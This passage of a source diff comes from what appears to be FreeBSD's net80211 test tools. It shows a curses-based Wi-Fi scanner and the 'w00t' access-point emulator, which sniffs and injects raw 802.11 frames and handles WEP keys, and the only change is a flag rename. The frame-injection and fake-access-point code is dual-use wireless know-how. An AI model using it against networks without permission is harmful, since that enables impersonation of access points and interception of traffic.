BIOCSETIF, &ifr) < 0) die(1, "ioctl(BIOCSETIF)"); if (ioctl(fd, BIOCSDLT, &dlt) < 0) die(1, "ioctl(BIOCSDLT)"); i = 1; if(ioctl(fd, BIOCIMMEDIATE, &i) < 0) die(1, "ioctl(BIOCIMMEDIATE)"); bpf_s = fd; } void user_input() { static char chan[3]; static int pos = 0; int c; c = getch(); switch (c) { case 'w': save_state(); break; case 'q': cleanup(0); break; case 'c': chaninfo.locked = !chaninfo.locked; break; case ERR: die(0, "getch()"); break; case '0': case '1': case '2': case '3': case '4': case '5': case '6': case '7': case '8': case '9': chan[pos++] = c; if (pos == 2) { int ch = atoi(chan); if (ch <= 11 && ch >= 1) { set_chan(atoi(chan)); chaninfo.locked = 1; } pos = 0; } break; default: pos = 0; break; } } void display_node(struct node_info* node) { int x = 0; int y = 0; int i; char chan[3]; char* ssid = 0; int sig, max, left, noise; char* wep = 0; y = node->pos; if (y == -1) // offscreen return; assert(y < LINES); // MAC mvaddstr(y, x, mac2str(node->mac)); x += 6*3; // WEP wep = wep2str(node->wep); assert(wep); mvaddstr(y, x, wep); x += strlen(wep); x++; // CHAN sprintf(chan, "%.2d", node->chan); mvaddstr(y, x, chan); x += 3; // ssid ssid = ssid2str(node); assert(ssid); mvaddstr(y, x, ssid); x += strlen(ssid); x++; left = COLS - x - 1; sig = (int) ( ((double)node->signal)*left/100.0 ); noise=(int) ( ((double)node->noise)*left/100.0 ); max = (int) ( ((double)node->max)*left/100.0 ); // SIGNAL BAR for (i = 0; i < noise; i++) mvaddch(y, x++, 'N'); for (; i < sig; i++) mvaddch(y,x++, 'X'); for (; i < max; i++) mvaddch(y,x++, ' '); mvaddch(y,x++, '|'); for (; x < COLS-1; x++) mvaddch(y, x, ' '); assert (x <= COLS); } void update_node(struct node_info* data) { struct node_info* node; int sort = 0; assert(data->signal <= 100); node = nodes; // first time [virgin] if (!node) { node = (struct node_info*) malloc(sizeof(struct node_info)); if (!node) die(1, "malloc()"); memset(node, 0, sizeof(*node)); memcpy(node->mac, data->mac, 6); nodes = node; } while (node) { // found it if (memcmp(node->mac, data->mac, 6) == 0) break; // end of chain if (!node->next) { node->next = (struct node_info*) malloc(sizeof(struct node_info)); if (!node->next) die(1, "malloc()"); memset(node->next, 0, sizeof(*node->next)); memcpy(node->next->mac, data->mac, 6); node->next->prev = node; node->next->pos = node->pos+1; node = node->next; if (node->pos == LINES) sort = 1; break; } node = node->next; } assert(node); // too many nodes for screen if (sort) { struct node_info* ni = nodes; while (ni) { if (ni->pos != -1) ni->pos--; display_node(ni); ni = ni->next; } } node->signal = data->signal; if (data->signal > 
node->max) node->max = data->signal; if (gettimeofday(&node->seen, NULL) == -1) die(1, "gettimeofday()"); if (data->ssid[0] != 0) strcpy(node->ssid, data->ssid); if (data->chan != -1) node->chan = data->chan; if (data->wep != -1) { // XXX LAME --- won't detect if AP changes WEP mode in // beacons... if (node->wep != CRYPT_WEP && node->wep != CRYPT_NONE && data->wep == CRYPT_WEP) { } else node->wep = data->wep; } if (data->ap != -1) node->ap = data->ap; display_node(node); refresh(); } void get_beacon_info(unsigned char* data, int rd, struct node_info* node) { int blen = 8 + 2 + 2; strcpy(node->ssid, ""); node->chan = 0; node->wep = CRYPT_NONE; assert(rd >= blen); if (IEEE80211_BEACON_CAPABILITY(data) & IEEE80211_CAPINFO_PRIVACY) node->wep = CRYPT_WEP; data += blen; rd -= blen; while (rd > 2) { int eid, elen; eid = *data; data++; elen = *data; data++; rd -= 2; // short! if (rd < elen) { return; } // ssid if (eid == 0) { if (elen == 1 && data[0] == 0) { // hidden } else { memcpy(node->ssid, data, elen); node->ssid[elen] = 0; } } // chan else if(eid == 3) { // weird chan! if( elen != 1) goto next; node->chan = *data; } // WPA else if (eid == 221 && node->wep == CRYPT_WEP) { struct ieee80211_ie_wpa* wpa; wpa = (struct ieee80211_ie_wpa*) data; if (elen < 6) goto next; if (!memcmp(wpa->wpa_oui, "\x00\x50\xf2", 3)) { // node->wep = CRYPT_WPA; } else goto next; if (wpa->wpa_type == WPA_OUI_TYPE && le16toh(wpa->wpa_version) == WPA_VERSION) { int cipher, auth; unsigned char* ptr; node->wep = CRYPT_WPA1; if (elen < 12) goto next; cipher = ((unsigned char*) wpa->wpa_mcipher)[3]; ptr = (unsigned char*)wpa + 12 + 4 * le16toh(wpa->wpa_uciphercnt); if (elen < (ptr - data + 6)) goto next; if ( *((unsigned short*) ptr) == 0) goto next; ptr += 2 + 3; auth = *ptr; if (cipher == WPA_CSE_TKIP) { node->wep = CRYPT_WPA1_TKIP; if (auth == WPA_ASE_8021X_PSK) node->wep = CRYPT_WPA1_TKIP_PSK; } if (cipher == WPA_CSE_CCMP) { node->wep = CRYPT_WPA1_CCMP; if (auth == WPA_ASE_8021X_PSK) node->wep = CRYPT_WPA1_CCMP_PSK; } } } else if (eid == 48 && node->wep == CRYPT_WEP) { unsigned char* ptr; // XXX no bounds checking ptr = data; if (ptr[0] == 1 && ptr[1] == 0) { unsigned short* count; int cipher = 0; ptr += 2; node->wep = CRYPT_80211i; if (!memcmp(ptr, "\x00\x0f\xac\x02", 4)) { node->wep = CRYPT_80211i_TKIP; cipher = 1; } ptr += 4; count = (unsigned short*) ptr; ptr +=2 + *count*4; count = (unsigned short*) ptr; if (*count) { ptr += 2; if (!memcmp(ptr,"\x00\x0f\xac\x02", 4)) { if (cipher) node->wep = CRYPT_80211i_TKIP_PSK; } } } } next: data += elen; rd -= elen; } } int get_packet_info(struct ieee80211_frame* wh, unsigned char* body, int bodylen, struct node_info* node) { int type, stype; node->chan = chaninfo.chan; node->wep = -1; node->ssid[0] = 0; node->ap = -1; type = wh->i_fc[0] & IEEE80211_FC0_TYPE_MASK; if (type == IEEE80211_FC0_TYPE_CTL) return 0; #if 0 if (wh->i_addr2[0] != 0) { mvprintw(30,30,"%s %x",mac2str(wh->i_addr2), wh->i_fc[0]); } #endif stype = wh->i_fc[0] & IEEE80211_FC0_SUBTYPE_MASK; if (type == IEEE80211_FC0_TYPE_MGT && stype == IEEE80211_FC0_SUBTYPE_BEACON) { get_beacon_info(body, bodylen, node); node->ap = 1; } else if (type == IEEE80211_FC0_TYPE_DATA && stype == IEEE80211_FC0_SUBTYPE_DATA) { - if (wh->i_fc[1] & IEEE80211_FC1_WEP) { + if (wh->i_fc[1] & IEEE80211_FC1_PROTECTED) { unsigned char* iv; node->wep = CRYPT_WEP; iv = body; iv += 3; // extended IV? 
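/* The Protected bit (formerly the WEP bit) only indicates that the payload is encrypted; to tell WEP apart from TKIP/CCMP the tool peeks at the key-ID octet of the IV, whose Ext IV flag marks an extended (TKIP/CCMP) IV. The WPA branch below is compiled out, so protected data frames are still reported as WEP. */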
if (*iv & (1 << 1)) { #if 0 node->wep = CRYPT_WPA; mvprintw(20,20, "shei"); exit(1); #endif } } if (wh->i_fc[1] & IEEE80211_FC1_DIR_FROMDS) node->ap = 1; else node->ap = 0; } memcpy(node->mac, wh->i_addr2, 6); return 1; } void radiotap(unsigned char* data, int rd) { struct ieee80211_radiotap_header* rth; struct ieee80211_frame* wh; char* body; struct node_info node; int8_t signal_dbm, noise_dbm; uint8_t signal_db, noise_db; int dbm = 0; int signal = 0; int i; rd -= 4; // 802.11 CRC // radiotap rth = (struct ieee80211_radiotap_header*) data; // 802.11 wh = (struct ieee80211_frame*) ((char*)rth + rth->it_len); rd -= rth->it_len; assert (rd >= 0); // body body = (char*) wh + sizeof(*wh); rd -= sizeof(*wh); if (!get_packet_info(wh, body, rd, &node)) return; // signal and noise body = (char*) rth + sizeof(*rth); signal_dbm = noise_dbm = signal_db = noise_db = 0; for (i = IEEE80211_RADIOTAP_TSFT; i <= IEEE80211_RADIOTAP_EXT; i++) { if (!(rth->it_present & (1 << i))) continue; switch (i) { case IEEE80211_RADIOTAP_TSFT: body += sizeof(uint64_t); break; case IEEE80211_RADIOTAP_FLAGS: case IEEE80211_RADIOTAP_RATE: body += sizeof(uint8_t); break; case IEEE80211_RADIOTAP_CHANNEL: body += sizeof(uint16_t)*2; break; case IEEE80211_RADIOTAP_FHSS: body += sizeof(uint16_t); break; case IEEE80211_RADIOTAP_DBM_ANTSIGNAL: signal_dbm = *body; body++; dbm = 1; break; case IEEE80211_RADIOTAP_DBM_ANTNOISE: noise_dbm = *body; body++; break; case IEEE80211_RADIOTAP_DB_ANTSIGNAL: signal_db = *((unsigned char*)body); body++; break; case IEEE80211_RADIOTAP_DB_ANTNOISE: noise_db = *((unsigned char*)body); body++; break; case IEEE80211_RADIOTAP_EXT: abort(); break; } } if (dbm) { signal = signal_dbm - noise_dbm; } else { signal = signal_db - noise_db; } if (signal < 0) signal = 0; node.signal = signal; #if 0 if (node.signal > 100 || node.signal < 0) { mvprintw(25,25, "sig=%d", node.signal); } #else assert (node.signal <= 100 && node.signal >= 0); #endif update_node(&node); } void bpf_input() { static unsigned char buf[4096]; int rd; struct bpf_hdr* bpfh; unsigned char* data; rd = read(bpf_s, buf, sizeof(buf)); if (rd == -1) die(1,"read()"); bpfh = (struct bpf_hdr*) buf; rd -= bpfh->bh_hdrlen; if (rd != bpfh->bh_caplen) { assert( rd > bpfh->bh_caplen); rd = bpfh->bh_caplen; } data = (unsigned char*) bpfh + bpfh->bh_hdrlen; radiotap(data, rd); } unsigned long elapsed_ms(struct timeval* now, struct timeval* prev) { unsigned long elapsed = 0; if (now->tv_sec > prev->tv_sec) elapsed = 1000*1000 - prev->tv_usec + now->tv_usec; else { assert(now->tv_sec == prev->tv_sec); elapsed = now->tv_usec - prev->tv_usec; } elapsed /= 1000; //ms elapsed += (now->tv_sec - prev->tv_sec)*1000; return elapsed; } void chanhop(struct timeval* tv) { unsigned long elapsed = 0; if (gettimeofday(tv, NULL) == -1) die(1, "gettimeofday()"); elapsed = elapsed_ms(tv, &chaninfo.last_hop); // need to chan hop if (elapsed >= hopfreq) { int c; c = chaninfo.chan + 1; if (c > 11) c = 1; set_chan(c); elapsed = hopfreq; } // how much can we sleep? else { elapsed = hopfreq - elapsed; } // ok calculate sleeping time... 
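/* Turn the milliseconds left before the next hop into the timeval that own() passes to select(), so the loop wakes up when it is time to change channel. */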
tv->tv_sec = elapsed/1000; tv->tv_usec = (elapsed - tv->tv_sec*1000)*1000; } void check_seen(struct timeval* tv) { unsigned long elapsed = 0; struct timeval now; int need_refresh = 0; unsigned long min_wait = 0; unsigned long will_wait; will_wait = tv->tv_sec*1000+tv->tv_usec/1000; min_wait = will_wait; struct node_info* node = nodes; if (gettimeofday(&now, NULL) == -1) die(1, "gettimeofday()"); while(node) { if (node->signal) { elapsed = elapsed_ms(&now, &node->seen); // node is dead... if (elapsed >= sig_reset) { node->signal = 0; display_node(node); need_refresh = 1; } // need to check soon possibly... else { unsigned long left; left = sig_reset - elapsed; if (left < min_wait) left = min_wait; } } node = node->next; } if (need_refresh) refresh(); // need to sleep for less... if (min_wait < will_wait) { tv->tv_sec = min_wait/1000; tv->tv_usec = (min_wait - tv->tv_sec*1000)*1000; } } void own(char* ifname) { int rd; fd_set fds; struct timeval tv; int dlt = DLT_IEEE802_11_RADIO; hopfreq = 1000; setup_if(ifname); open_bpf(ifname, dlt); while(1) { // XXX innefficient all of this... if (!chaninfo.locked) chanhop(&tv); else { tv.tv_sec = 1; tv.tv_usec = 0; } // especially this... check_seen(&tv); FD_ZERO(&fds); FD_SET(0, &fds); FD_SET(bpf_s, &fds); rd = select(bpf_s+1, &fds,NULL , NULL, &tv); if (rd == -1) die(1, "select()"); if (FD_ISSET(0, &fds)) user_input(); if (FD_ISSET(bpf_s, &fds)) bpf_input(); } } void init_globals() { ioctl_s = socket(PF_INET, SOCK_DGRAM, 0); if (ioctl_s == -1) { perror("socket()"); exit(1); } chaninfo.locked = 0; chaninfo.chan = 0; } int main(int argc, char *argv[]) { if (argc < 2) { printf("Usage: %s \n", argv[0]); exit(1); } init_globals(); initscr(); cbreak(); noecho(); nonl(); intrflush(stdscr, FALSE); keypad(stdscr, TRUE); curs_set(0); clear(); refresh(); signal(SIGINT, cleanup); signal(SIGTERM, cleanup); own(argv[1]); cleanup(0); exit(0); } diff --git a/tools/tools/net80211/w00t/ap/ap.c b/tools/tools/net80211/w00t/ap/ap.c index 65f7adb1e902..836f588a65b6 100644 --- a/tools/tools/net80211/w00t/ap/ap.c +++ b/tools/tools/net80211/w00t/ap/ap.c @@ -1,916 +1,916 @@ /*- * Copyright (c) 2006, Andrea Bittau * All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * * THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. 
* * $FreeBSD$ */ #include #include #include #include #include #include #include #include #include #include #include "w00t.h" struct client { char mac[6]; int seq; struct client *next; }; struct params { /* fds */ int tx; int rx; int tap; /* ap params */ char mac[6]; char ssid[256]; int chan; /* beacon */ int bint; struct timeval blast; int seq; /* wep */ int wep_len; char wep_key[13]; int wep_iv; struct client *clients; /* lame window */ char packet[4096]; int packet_len; int packet_try; struct timeval plast; }; void usage(char *name) { printf("Usage: %s \n" "-h\thelp\n" "-i\t\n" "-s\t\n" "-m\t\n" "-w\t\n" "-c\t\n" "-t\t\n" , name); exit(0); } void fill_basic(struct ieee80211_frame *wh, struct params *p) { short *seq; wh->i_dur[0] = 0x69; wh->i_dur[1] = 0x00; memcpy(wh->i_addr2, p->mac, 6); seq = (short*)wh->i_seq; *seq = seqfn(p->seq, 0); } void send_frame(struct params *p, void *buf, int len) { int rc; rc = inject(p->tx, buf, len); if (rc == -1) err(1, "inject()"); if (rc != len) { printf("injected %d/%d\n", rc, len); exit(1); } p->seq++; } int fill_beacon(struct params *p, struct ieee80211_frame *wh) { int len; char *ptr; ptr = (char*) (wh+1); ptr += 8; /* timestamp */ ptr += 2; /* bint */ *ptr |= IEEE80211_CAPINFO_ESS; ptr += 2; /* capa */ /* ssid */ len = strlen(p->ssid); *ptr++ = 0; *ptr++ = len; memcpy(ptr, p->ssid, len); ptr += len; /* rates */ *ptr++ = 1; *ptr++ = 4; *ptr++ = 2 | 0x80; *ptr++ = 4 | 0x80; *ptr++ = 11; *ptr++ = 22; /* ds param */ *ptr++ = 3; *ptr++ = 1; *ptr++ = p->chan; return ptr - ((char*) wh); } void send_beacon(struct params *p) { char buf[4096]; struct ieee80211_frame *wh; int len; char *ptr; wh = (struct ieee80211_frame*) buf; memset(buf, 0, sizeof(buf)); fill_basic(wh, p); memset(wh->i_addr1, 0xff, 6); memcpy(wh->i_addr3, p->mac, 6); wh->i_fc[0] |= IEEE80211_FC0_TYPE_MGT; wh->i_fc[0] |= IEEE80211_FC0_SUBTYPE_BEACON; len = fill_beacon(p, wh); /* TIM */ ptr = (char*)wh + len; *ptr++ = 5; *ptr++ = 4; len += 2+4; #if 0 printf("sending beacon\n"); #endif send_frame(p, wh, len); if (gettimeofday(&p->blast, NULL) == -1) err(1, "gettimeofday()"); } void send_pres(struct params *p, char *mac) { char buf[4096]; struct ieee80211_frame *wh; int len; wh = (struct ieee80211_frame*) buf; memset(buf, 0, sizeof(buf)); fill_basic(wh, p); memcpy(wh->i_addr1, mac, 6); memcpy(wh->i_addr3, p->mac, 6); wh->i_fc[0] |= IEEE80211_FC0_TYPE_MGT; wh->i_fc[0] |= IEEE80211_FC0_SUBTYPE_PROBE_RESP; len = fill_beacon(p, wh); printf("sending probe response\n"); send_frame(p, wh, len); } void read_preq(struct params *p, struct ieee80211_frame *wh, int len) { unsigned char *ptr; unsigned char *end; unsigned char macs[6*3]; ptr = (unsigned char*) (wh+1); /* ssid */ if (*ptr != 0) { printf("weird pr %x\n", *ptr); return; } ptr++; end = ptr + (*ptr) + 1; *end = 0; ptr++; mac2str(macs, wh->i_addr2); printf("Probe request for [%s] from %s\n", ptr, macs); if ((strcmp(ptr, "") == 0) || (strcmp(ptr, p->ssid) == 0)) send_pres(p, wh->i_addr2); } void send_auth(struct params* p, char *mac) { char buf[4096]; struct ieee80211_frame *wh; unsigned short *ptr; int len; wh = (struct ieee80211_frame*) buf; memset(buf, 0, sizeof(buf)); fill_basic(wh, p); memcpy(wh->i_addr1, mac, 6); memcpy(wh->i_addr3, p->mac, 6); wh->i_fc[0] |= IEEE80211_FC0_TYPE_MGT; wh->i_fc[0] |= IEEE80211_FC0_SUBTYPE_AUTH; ptr = (unsigned short*) (wh+1); *ptr++ = htole16(0); *ptr++ = htole16(2); *ptr++ = htole16(0); len = ((char*)ptr) - ((char*) wh); printf("sending auth\n"); send_frame(p, wh, len); } void read_auth(struct params *p, struct 
ieee80211_frame *wh, int len) { unsigned short *ptr; char mac[6*3]; if (memcmp(wh->i_addr1, p->mac, 6) != 0) return; ptr = (unsigned short*) (wh+1); if (le16toh(*ptr) != 0) { printf("Unknown auth algo %d\n", le16toh(*ptr)); return; } ptr++; if (le16toh(*ptr) == 1) { mac2str(mac, wh->i_addr2); printf("Got auth from %s\n", mac); send_auth(p, wh->i_addr2); } else { printf("Weird seq in auth %d\n", le16toh(*ptr)); } } void send_assoc(struct params *p, char *mac) { char buf[4096]; struct ieee80211_frame *wh; char *ptr; int len; wh = (struct ieee80211_frame*) buf; memset(buf, 0, sizeof(buf)); fill_basic(wh, p); memcpy(wh->i_addr1, mac, 6); memcpy(wh->i_addr3, p->mac, 6); wh->i_fc[0] |= IEEE80211_FC0_TYPE_MGT; wh->i_fc[0] |= IEEE80211_FC0_SUBTYPE_ASSOC_RESP; ptr = (char*) (wh+1); *ptr |= IEEE80211_CAPINFO_ESS; ptr += 2; /* cap */ ptr += 2; /* status */ ptr += 2; /* aid */ /* rates */ *ptr++ = 1; *ptr++ = 4; *ptr++ = 2 | 0x80; *ptr++ = 4 | 0x80; *ptr++ = 11; *ptr++ = 22; len = ptr - ((char*) wh); printf("sending assoc response\n"); send_frame(p, wh, len); } void read_assoc(struct params *p, struct ieee80211_frame *wh, int len) { unsigned char *ptr; unsigned char *end; unsigned char macs[6*3]; if (memcmp(wh->i_addr1, p->mac, 6) != 0) return; ptr = (unsigned char*) (wh+1); ptr += 2; /* capa */ ptr += 2; /* list interval */ /* ssid */ if (*ptr != 0) { printf("weird pr %x\n", *ptr); return; } ptr++; end = ptr + (*ptr) + 1; *end = 0; ptr++; mac2str(macs, wh->i_addr2); printf("Assoc request for [%s] from %s\n", ptr, macs); if (strcmp(ptr, p->ssid) == 0) send_assoc(p, wh->i_addr2); } void read_mgt(struct params *p, struct ieee80211_frame *wh, int len) { switch (wh->i_fc[0] & IEEE80211_FC0_SUBTYPE_MASK) { case IEEE80211_FC0_SUBTYPE_PROBE_REQ: read_preq(p, wh, len); break; case IEEE80211_FC0_SUBTYPE_PROBE_RESP: break; case IEEE80211_FC0_SUBTYPE_AUTH: read_auth(p, wh, len); break; case IEEE80211_FC0_SUBTYPE_ASSOC_REQ: read_assoc(p, wh, len); break; case IEEE80211_FC0_SUBTYPE_ASSOC_RESP: case IEEE80211_FC0_SUBTYPE_BEACON: break; default: printf("wtf %d\n", (wh->i_fc[0] & IEEE80211_FC0_SUBTYPE_MASK) >> IEEE80211_FC0_SUBTYPE_SHIFT); abort(); break; } } void send_cts(struct params *p, char *mac) { char buf[64]; struct ieee80211_frame *wh; memset(buf, 0, sizeof(buf)); wh = (struct ieee80211_frame*) buf; wh->i_fc[0] |= IEEE80211_FC0_TYPE_CTL; wh->i_fc[0] |= IEEE80211_FC0_SUBTYPE_CTS; wh->i_dur[0] = 0x69; wh->i_dur[0] = 0x00; memcpy(wh->i_addr1, mac, 6); send_frame(p, wh, 10); } void read_rts(struct params *p, struct ieee80211_frame *wh, int len) { if (memcmp(wh->i_addr1, p->mac, 6) != 0) return; send_cts(p, wh->i_addr2); } void read_ack(struct params *p, struct ieee80211_frame *wh, int len) { if (memcmp(wh->i_addr1, p->mac, 6) == 0) p->packet_try = 0; } void read_ctl(struct params *p, struct ieee80211_frame *wh, int len) { switch (wh->i_fc[0] & IEEE80211_FC0_SUBTYPE_MASK) { case IEEE80211_FC0_SUBTYPE_RTS: read_rts(p, wh, len); break; case IEEE80211_FC0_SUBTYPE_ACK: read_ack(p, wh, len); break; case IEEE80211_FC0_SUBTYPE_CTS: break; default: printf("wtf %d\n", (wh->i_fc[0] & IEEE80211_FC0_SUBTYPE_MASK) >> IEEE80211_FC0_SUBTYPE_SHIFT); abort(); break; } #if 0 printf("ctl\n"); #endif } int broadcast(struct ieee80211_frame *wh) { /* XXX multicast */ if (memcmp(wh->i_addr1, "\xff\xff\xff\xff\xff\xff", 6) == 0) return 1; return 0; } void enque(struct params *p, struct ieee80211_frame *wh, int len) { if (broadcast(wh)) return; assert(sizeof(p->packet) >= len); memcpy(p->packet, wh, len); p->packet_len = len; 
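/* Only one unicast frame is kept pending at a time: the stored copy carries the RETRY bit, and packet_try stays non-zero until read_ack() sees the ACK or retransmit() exhausts its retry limit. */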
p->packet_try = 1; wh = (struct ieee80211_frame*) p->packet; wh->i_fc[1] |= IEEE80211_FC1_RETRY; if (gettimeofday(&p->plast, NULL) == -1) err(1, "gettimeofday()"); } void relay_data(struct params *p, struct ieee80211_frame *wh, int len) { char seq[2]; char fc[2]; unsigned short *ps; /* copy crap */ memcpy(fc, wh->i_fc, 2); memcpy(seq, wh->i_seq, 2); /* relay frame */ wh->i_fc[1] &= ~(IEEE80211_FC1_DIR_TODS | IEEE80211_FC1_RETRY); wh->i_fc[1] |= IEEE80211_FC1_DIR_FROMDS; memcpy(wh->i_addr1, wh->i_addr3, sizeof(wh->i_addr1)); memcpy(wh->i_addr3, wh->i_addr2, sizeof(wh->i_addr3)); memcpy(wh->i_addr2, p->mac, sizeof(wh->i_addr2)); ps = (unsigned short*)wh->i_seq; *ps = seqfn(p->seq, 0); send_frame(p, wh, len); enque(p, wh, len); /* restore */ memcpy(wh->i_fc, fc, sizeof(fc)); memcpy(wh->i_addr2, wh->i_addr3, sizeof(wh->i_addr2)); memcpy(wh->i_addr3, wh->i_addr1, sizeof(wh->i_addr2)); memcpy(wh->i_addr1, p->mac, sizeof(wh->i_addr1)); memcpy(wh->i_seq, seq, sizeof(seq)); } void read_real_data(struct params *p, struct ieee80211_frame *wh, int len) { char dst[6]; int rc; char *ptr = (char*) (wh+1); /* stuff not for this net */ if (memcmp(wh->i_addr1, p->mac, 6) != 0) return; /* relay data */ if (memcmp(wh->i_addr3, p->mac, 6) != 0) relay_data(p, wh, len); memcpy(dst, wh->i_addr3, 6); - if (wh->i_fc[1] & IEEE80211_FC1_WEP) { + if (wh->i_fc[1] & IEEE80211_FC1_PROTECTED) { if (!p->wep_len) { printf("Got wep but i aint wep\n"); return; } if (wep_decrypt(wh, len, p->wep_key, p->wep_len) == -1){ printf("Can't decrypt\n"); return; } ptr += 4; len -= 8; } /* ether header */ ptr += 8 - 2; ptr -= 6; memcpy(ptr, wh->i_addr2, 6); ptr -= 6; memcpy(ptr, dst, 6); len -= sizeof(*wh); len -= 8; len += 14; /* send to tap */ rc = write(p->tap, ptr, len); if (rc == -1) err(1, "write()"); if (rc != len) { printf("Wrote %d/%d\n", rc, len); exit(1); } } void read_data(struct params *p, struct ieee80211_frame *wh, int len) { switch (wh->i_fc[0] & IEEE80211_FC0_SUBTYPE_MASK) { case IEEE80211_FC0_SUBTYPE_DATA: read_real_data(p, wh, len); break; case IEEE80211_FC0_SUBTYPE_NODATA: break; default: printf("wtf %d\n", (wh->i_fc[0] & IEEE80211_FC0_SUBTYPE_MASK) >> IEEE80211_FC0_SUBTYPE_SHIFT); abort(); break; } } struct client* client_find(struct params *p, char *mac) { struct client* c = p->clients; while (c) { if (memcmp(c->mac, mac, 6) == 0) return c; c = c->next; } return NULL; } void client_insert(struct params *p, struct client *c) { #if 1 do { char mac[6*3]; mac2str(mac, c->mac); printf("Adding client %s\n", mac); } while(0); #endif c->next = p->clients; p->clients = c; } int duplicate(struct params *p, struct ieee80211_frame *wh, int rc) { struct client *c; int s; if (!frame_type(wh, IEEE80211_FC0_TYPE_DATA, IEEE80211_FC0_SUBTYPE_DATA)) return 0; s = seqno(wh); c = client_find(p, wh->i_addr2); if (!c) { c = malloc(sizeof(*c)); if (!c) err(1, "malloc()"); memset(c, 0, sizeof(*c)); memcpy(c->mac, wh->i_addr2, 6); c->seq = s-1; client_insert(p, c); } if (wh->i_fc[1] & IEEE80211_FC1_RETRY) { if ( (s <= c->seq) && ((c->seq - s ) < 5)) { #if 0 printf("Dup seq %d prev %d\n", s, c->seq); #endif return 1; } } #if 0 do { char mac[3*6]; mac2str(mac, c->mac); printf("%s seq %d prev %d\n", mac, s, c->seq); } while (0); #endif c->seq = s; return 0; } void ack(struct params *p, struct ieee80211_frame *wh) { if (memcmp(wh->i_addr1, p->mac, 6) != 0) return; if ((wh->i_fc[0] & IEEE80211_FC0_TYPE_MASK) == IEEE80211_FC0_TYPE_CTL) return; send_ack(p->tx, wh->i_addr2); } void read_wifi(struct params *p) { char buf[4096]; int rc; struct 
ieee80211_frame *wh; rc = sniff(p->rx, buf, sizeof(buf)); if (rc == -1) err(1, "sniff()"); wh = get_wifi(buf, &rc); if (!wh) return; /* filter my own shit */ if (memcmp(wh->i_addr2, p->mac, 6) == 0) { /* XXX CTL frames */ if ((wh->i_fc[0] & IEEE80211_FC0_TYPE_MASK) != IEEE80211_FC0_TYPE_CTL) return; } #if 1 ack(p, wh); #endif if (duplicate(p, wh, rc)) { #if 0 printf("Dup\n"); #endif return; } switch (wh->i_fc[0] & IEEE80211_FC0_TYPE_MASK) { case IEEE80211_FC0_TYPE_MGT: read_mgt(p, wh, rc); break; case IEEE80211_FC0_TYPE_CTL: read_ctl(p, wh, rc); break; case IEEE80211_FC0_TYPE_DATA: read_data(p, wh, rc); break; default: printf("wtf\n"); abort(); break; } } void read_tap(struct params *p) { char buf[4096]; char *ptr; int len = sizeof(buf); int offset; char src[6], dst[6]; struct ieee80211_frame *wh; int rd; ptr = buf; offset = sizeof(struct ieee80211_frame) + 8 - 14; if (p->wep_len) offset += 4; ptr += offset; len -= offset; /* read packet */ memset(buf, 0, sizeof(buf)); rd = read(p->tap, ptr, len); if (rd == -1) err(1, "read()"); /* 802.11 header */ wh = (struct ieee80211_frame*) buf; memcpy(dst, ptr, sizeof(dst)); memcpy(src, ptr+6, sizeof(src)); fill_basic(wh, p); memcpy(wh->i_addr3, src, sizeof(wh->i_addr3)); memcpy(wh->i_addr1, dst, sizeof(wh->i_addr1)); wh->i_fc[0] |= IEEE80211_FC0_TYPE_DATA; wh->i_fc[1] |= IEEE80211_FC1_DIR_FROMDS; if (p->wep_len) - wh->i_fc[1] |= IEEE80211_FC1_WEP; + wh->i_fc[1] |= IEEE80211_FC1_PROTECTED; /* LLC & SNAP */ ptr = (char*) (wh+1); if (p->wep_len) ptr += 4; *ptr++ = 0xAA; *ptr++ = 0xAA; *ptr++ = 0x03; *ptr++ = 0x00; *ptr++ = 0x00; *ptr++ = 0x00; /* ether type overlaps w00t */ rd += offset; /* WEP */ if (p->wep_len) { ptr = (char*) (wh+1); memcpy(ptr, &p->wep_iv, 3); ptr[3] = 0; p->wep_iv++; wep_encrypt(wh, rd, p->wep_key, p->wep_len); rd += 4; /* ICV */ } send_frame(p, wh, rd); } int retransmit(struct params *p) { #if 0 printf("RETRANS %d\n", p->packet_try); #endif send_frame(p, p->packet, p->packet_len); p->packet_try++; if (p->packet_try > 3) p->packet_try = 0; else { if (gettimeofday(&p->plast, NULL) == -1) err(1, "gettimeofday()"); } return p->packet_try; } void next_event(struct params *p) { struct timeval to, now; int el; int max; fd_set fds; int rtr = 3*1000; /* figure out select timeout */ if (gettimeofday(&now, NULL) == -1) err(1, "gettimeofday()"); /* check beacon timeout */ el = elapsed(&p->blast, &now); if (el >= p->bint) { send_beacon(p); el = 0; } el = p->bint - el; to.tv_sec = el/1000/1000; to.tv_usec = el - to.tv_sec*1000*1000; /* check tx timeout */ if (p->packet_try) { el = elapsed(&p->plast, &now); if (el >= rtr) { /* check if we gotta retransmit more */ if (retransmit(p)) { el = 0; } else el = -1; } /* gotta retransmit in future */ if (el != -1) { el = rtr - el; if ((to.tv_sec*1000*1000 + to.tv_usec) > el) { to.tv_sec = el/1000/1000; to.tv_usec = el - to.tv_sec*1000*1000; } } } /* select */ FD_ZERO(&fds); FD_SET(p->rx, &fds); FD_SET(p->tap, &fds); max = p->rx > p->tap ? 
